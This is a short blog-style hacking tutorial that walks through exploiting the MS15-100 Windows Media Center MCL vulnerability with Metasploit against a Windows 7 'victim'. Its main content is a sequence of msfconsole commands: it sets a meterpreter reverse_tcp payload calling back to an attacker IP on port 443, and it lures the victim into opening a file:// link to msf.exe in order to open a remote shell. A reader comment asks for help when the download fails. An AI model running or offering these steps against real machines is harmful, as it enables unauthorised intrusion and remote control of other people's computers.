Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability

September 18, 2015 by Raj Chandel

This module exploits vulnerability in Windows Media Center. By supplying an UNC path in the *.mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/ms15_100_mclexe

msf exploit (ms15_100_mclexe)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms15_100_mclexe)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (ms15_100_mclexe)>set lport 443

msf exploit (ms15_100_mclexe)>exploit

Now when the victim opens the following link (file://192.168.1.7/aqxtlL/msf.exe) it will show the page like given below

Now type sessions –l to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

One thought on “Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability”

nicola says:

December 11, 2015 at 1:21 pm

Hello,

My victim machine can’t download the file … But she can connect on apache serveur default webpage !
So what’s wrong ?

Thanks 🙂

Comments are closed.

Categories

Archives

Hacking Articles

Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability

One thought on “Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability”

Categories

Archives

Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability

One thought on “Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability”

You may like

A Detailed Guide on RustScan

Best Alternative of Netcat Listener